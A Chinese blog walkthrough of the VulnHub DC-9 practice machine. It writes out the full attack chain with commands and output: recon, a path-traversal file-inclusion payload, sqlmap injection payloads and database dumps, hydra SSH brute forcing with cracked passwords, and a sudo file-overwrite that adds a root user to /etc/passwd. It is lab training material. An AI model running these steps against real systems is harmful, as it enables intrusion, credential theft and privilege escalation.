vulnhub靶机推荐:dc9(本地文件包含,sql注入,文件覆盖提权)

最新推荐文章于 2024-09-11 10:34:24 发布
最新推荐文章于 2024-09-11 10:34:24 发布
阅读量1k 收藏 9
点赞数 23
文章标签: sql 数据库 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anddddoooo/article/details/142001241
版权

端口

nmap主机发现
nmap -sn 192.168.45.0/24
​
Nmap scan report for 192.168.45.116
Host is up (0.00020s latency).
​
116是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.45.116 --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT   STATE    SERVICE
22/tcp filtered ssh
80/tcp open     http
​
发现开放两个端口,但是ssh被防火墙阻拦
nmap -sT -sC -sV -O -p22,80 -oA nmap/scan 192.168.45.116
详细端口扫描:
-sT:完整tcp连接
-sC:默认脚本扫描
-sV:服务版本探测
-O:系统信息探测
​
探测结果没有什么有用的,不放出来了,唯一有用的是apache version:2.4.38

立足点

网站信息收集:目录扫描
看到网站主页是include.php 
gobuster扫描加上后缀
​
gobuster dir -u http://192.168.45.116/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html --add-slash
​
扫描结果
/.php/                (Status: 403) [Size: 279]
/index.php/           (Status: 200) [Size: 917]
/.html/               (Status: 403) [Size: 279]
/search.php/          (Status: 200) [Size: 1091]
/icons/               (Status: 403) [Size: 279]
/welcome.php/         (Status: 302) [Size: 0] [--> manage.php]
/results.php/         (Status: 200) [Size: 1056]
/display.php/         (Status: 200) [Size: 2961]
/css/                 (Status: 200) [Size: 933]
/includes/            (Status: 200) [Size: 747]
/logout.php/          (Status: 302) [Size: 0] [--> manage.php]
/config.php/          (Status: 200) [Size: 0]
/manage.php/          (Status: 200) [Size: 1210]
/session.php/         (Status: 302) [Size: 0] [--> manage.php]
/.php/                (Status: 403) [Size: 279]
/.html/               (Status: 403) [Size: 279]
​
进入网址:http://192.168.45.116/session.php/
后如下图,说明已经以admin身份登录,但此时重定向到manage.php
能交互的窗口只有search
能收集到的信息只有File does not exist

web漏洞探测(lfi漏洞发现)

看到File does not exist,是否服务器在本地读取了什么文件,采用常用方式传递参数?file=../../../../../../../etc/passwd,发现本地文件包含lfi漏洞,能读取服务器敏感文件/etc/passwd

因为ssh端口被过滤,看看是否能够通过knock命令控制防火墙让ssh端口开放不被过滤

首先要查看knock的配置文件,寻找服务器对knock的配置,其配置存放在/etc/knockd下,通过lfi漏洞查看

访问http://192.168.45.116/manage.php?file=../../../../../../../etc/knockd.conf
查看到
[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
​
[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
​
解析配置
    按7469,8475,9842顺序knock端口会触发开放ssh命令
    按9842,8475,7469顺序knock端口会触发过滤ssh命令
port knocking是服务器管理防火墙的一种方式,它以十分隐秘的方式让特定人员对服务器进行配置
如上的场景是管理员通过隐秘的方式控制着ssh端口的防火墙状态
sql注入漏洞的发现和利用

利用以上漏洞后,发现除了search没有其他可交互的地方(如下图),尝试sql注入

sqlmap尝试扫一下,利用burpsuit抓包,通过文件扫描,以下是raj文件

POST /results.php HTTP/1.1
Host: 192.168.45.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Origin: http://192.168.45.116
Connection: close
Referer: http://192.168.45.116/search.php
Cookie: PHPSESSID=40596pdfu8ifkv0msqcfhcos5p
Upgrade-Insecure-Requests: 1
​
search=gf
​

开始跑sqlmap,一下就扫出来

sqlmap -r raj --dbs --batch
解析:
-r:指定文件
--dbs:如果可以注入,枚举出所有的库
--batch:选择不交互,按默认选项扫描
​
漏洞:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=gf' AND (SELECT 6473 FROM (SELECT(SLEEP(5)))sevG) AND 'tOZA'='tOZA
​
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=gf' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a767871,0x544a5975436e77545a697767774e66534f7a6c437951536f43436453667478586d55756c775a754e,0x717a627071),NULL-- -
---
​
版本信息:
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
​
数据库:
available databases [3]:
[*] information_schema
[*] Staff
[*] users

查询 staff 和 users数据库所有信息

sqlmap -r raj -D Staff --dump-all --batch
sqlmap -r raj -D users --dump-all --batch
有users表的信息和Staff表的信息
​
users表:
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+
md5解密找到admin密码,不过已经不重要因为我们之前已经用admin登陆了

将所有Staff表信息复制到all-users中,如下图

收集所有密码和用户分别到passwd.txt中和username.txt中,方便hydra的ssh爆破

cat all_users | awk -F '|' {'print$4'} | awk -F ' ' {'print$1'} > passwd.txt
​
cat all_users | awk -F '|' {'print$6'} | awk -F ' ' {'print$1'} > username.txt
hydra爆破
hydra -L username.txt -P passwd.txt 192.168.45.116 ssh
​
发现3个用户可以登录
[22][ssh] host: 192.168.45.116   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.45.116   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.45.116   login: janitor   password: Ilovepeepee
​

提权

依次登录三个用户,都不能使用sudo -l 和 suid提权
但是看见janitor用户的目录下有隐藏文件
​
janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Sep  7 14:08 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Sep  7 14:08 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
​
打开.secrets-for-putin目录发现存放另外密码的文件
-rwx------ 1 janitor janitor   66 Dec 29  2019 passwords-found-on-post-it-notes.txt

拷贝新的密码文件到kali再一次爆破(这里将这个文件重命名为new-passwd)

hydra -L username.txt -P new-passwd 192.168.45.116 ssh
​
爆破出新用户
[22][ssh] host: 192.168.45.116   login: fredf   password: B4-Tru3-001

ssh登录探测此用户的权限

发现此用户可以使用sudo -l
​
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
​

能够以root权限调用/opt/devstuff/dist/test/test文件,允许一下

fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test
Usage: python test.py read append
​
提示说使用test.py进行read操作,推测test调用了test.py
​
strings /opt/devstuff/dist/test/test | grep Usage
扫描test文件发现没有Usage: python test.py read append字符串,说明确实是调用了外部test.py脚本

查询test.py脚本,并观看内容

find / -type f -name test.py 2>/dev/null
​
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py
​
cat /opt/devstuff/test.py
​
内容如下:
#!/usr/bin/python
​
import sys
​
if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)
​
else :
    f = open(sys.argv[1], "r")
    output = (f.read())
​
    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
​
解析:
python脚本读取一个文件后写入指定路径:test.py [read file] [write_file]
使用test调用时:test [read file] [write_file]

sudo利用

使用sudo调用test,test又调用脚本test.py,test.py也具有了root权限(在root进程中)
​
test.py的作用是覆盖文件,那么我们构造/etc/passwd恶意文件并覆盖原有的恶意文件我们就能以恶意用户登录
​
创建一个用户(hack用户,hack123密码)
openssl passwd -1 -salt hack hack123
密码hash后:$1$hack$WTn0dk2QjNeKfl.DHOUue0
​
构造恶意登录凭据和恶意/etc/passwd文件
cat /etc/passwd > /tmp/passwd
echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root:/bin/bash' >> /tmp/passwd         # 将hack加入root组
​
备份源文件
cat /etc/passwd > /etc/passwd.tmp
​
恶意文件覆盖源文件
sudo test /tmp/passwd /etc/passwd

使用hack用户登录

ssh hack@192.168.45.116
password:hack123
​
root权限
anddddoooo
关注
  • 23
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
看完这篇 教你玩转渗透测试靶机vulnhub——DC9
Aluxian_的博客
04-19 6475
Vulnhub靶机DC9渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入:③:文件包含:④:端口敲门: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://dow
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1672
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
热门推荐
Aluxian_的博客
03-23 1万+
Vulnhub靶机DC3渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:SQL注入:④:文件上传:⑤:提权Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载:
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3100
Vulnhub靶机渗透学习——DC-9
Vulnhub靶机】DC-3 (内核exp提权)
过期的秋刀鱼
08-06 602
登陆后,就要开始寻找有没有可以getshell的地方,这类的cms肯定是有上传文件的地方,这里可以上传一个一句话木马,用蚁剑进行连接,也可以写一个php,反弹shell到我们的攻击机上,这边,经过寻找发现了有个templates的beez3的目录。Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。利用John工具,对该密码进行爆破拆解,工具详细信息参考。
vulnhub靶机:DC-1
Keepb1ue的博客
09-28 2095
文章目录靶机配置说明:靶机环境配置:靶机渗透开始:确定目标ip:端口扫描:常规扫描下目录:msf漏洞利用:切换到交互式shell:获取敏感信息:重置管理员密码:添加管理员用户:suid提权: 靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 (VirtualBox) IP:192.168.56.110 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有详细的靶机说明,而DC-1需要寻找的flag总数为
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3018
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
Vulnhub 靶机实战系列 DC-3靶机
rumil的博客
04-15 799
发现网站管理后台等信息,结合浏览器插件发现使用joomla CMS,使用kali当中jooscn工具进行扫描,如果没有安装即可。点击新建文件即可,在html/处新建php文件,也可上传,但是不一定成功,可以创建文件后将代码复制进去。根据前面信息收集到的内容,采用得CMS和版本信息,进行漏洞搜索,是否有可利用的漏洞。根据漏洞信息,进行漏洞利用,查看一下文件内容,尝试利用,sqlmap爆数据库。找上传点,或者可以查看代码或可执行代码的地方,找到扩展处功能处,尝试。发现有at,可以尝试提权,但是未果。
vulnhub靶机试炼场之DC-3
Mrs_H的博客
01-05 2462
DC-3靶机渗透实战 一.前言 关于这次的靶机渗透文章我已经托更很久了,一直都没有时间来好好看一下这个靶机。最近也是到了放假的时候,也会陆续的把之前期末复习期间欠下的东西好好回顾一下。在上个月里也没有好好的看过靶场里面的题目,这个月打算趁年前把ssrf的坑填了,顺便也想把文件上传这方面的靶场习题开个坑,以前只有在打比赛的时候才会着重看的漏洞就是文件上传,关于其中的奇技淫巧还有着太多不熟悉的地方,有时间要好好看一下了。 二.正文 这次的靶机只有一个flag所以这次就不以flag的先后顺序做时间线了,就以渗透的
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
VulnHub靶机通关)DC-9
yang1234567898的博客
01-23 784
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口是filtered状态 web渗透 访问80端口的web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
vulnhub靶机:DC8
不想当脚本小子的脚本小子
01-05 321
信息来一波:先探测存活主机,再查看靶机开发的具体端口信息,发现其开发的80端口和22ssh端口 再访问一下DC8的主页看看: dirbuster扫描后台,没有发现什么特别的地方: 查看robots.txt文件发现了不少东西: 在最后发现了,本来想利用目录穿越漏洞,结果没有: 后来在主页中找到了一个SQL注入漏洞:(点了首页的)几个界面发现只有nid变化,界面不变,本来是想试试../../../../../../etc/passwd,结果报错,这里就是SQL注入,直接SQ
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权)
qq_45722813的博客
12-10 4265
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权) 靶机下载地址:https://www.vulnhub.com/entry/dc-8,367/ 将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机 使用nmap进行主机发现,获取靶机IP地址,命令nmap -Pn 192.168.172.1/24 再使用nmap扫描靶机操作系统,开放端口和对应服务等 靶机开放22端口对应ssh服务,80端口对应http服务,这也是一个drupal的网页
leetcode 1811 寻找面试候选人(postgresql)
最新发布
weixin_51696882的博客
09-11 688
编写 SQL 语句来返回 所有面试候选人 的姓名 name 和邮件 mail 。当用户满足以下两个要求中的 任意一条 ,其成为 面试候选人 : 该用户在 连续三场及更多 比赛中赢得 任意 奖牌。 该用户在 三场及更多不同的 比赛中赢得 金牌(这些比赛可以不是连续的) 可以以 任何顺序 返回结果。
被低估的SQL
weixin_61431494的博客
09-03 1652
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQLServer分组查询
NaZiMeKiY的博客
09-08 411
例如我们再在日期后加入一个总人数在3人及以上的限制,那么就会用到聚合函数count(),但是where中是不能使用聚合函数作为限制条件的,所以我们需要用到having关键字。注意点:在分组查询中除了使用聚合函数的数据和使用group by和select后面的分组之外,数据都无法作为一列显示。可以不断使用union链接,但是相对应的是代码实在太过繁琐,所以我们还是使用group by的方式进行分组。五.在使用分组查询时添加多个限制条件,并且使用到聚合函数。例如我们加上一个出生日期的限制,只统计00后的数据。
基于SSM的文物管理系统(含源码+sql+视频导入教程+文档+PPT)
coderbu的博客
09-06 1404
基于SSM的文物管理系统拥有俩种角色 管理员:个人信息管理、用户管理、分类管理、文物信息管理、文物外借管理、文物维修管理、留言板管理等 用户:登录注册、分类浏览文物信息,留言评论、收藏文物等
Python一些可能用的到的函数系列132 ORM-sqlalchemy连clickhouse
yukai08008的博客
09-06 936
继续ORM的转换。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值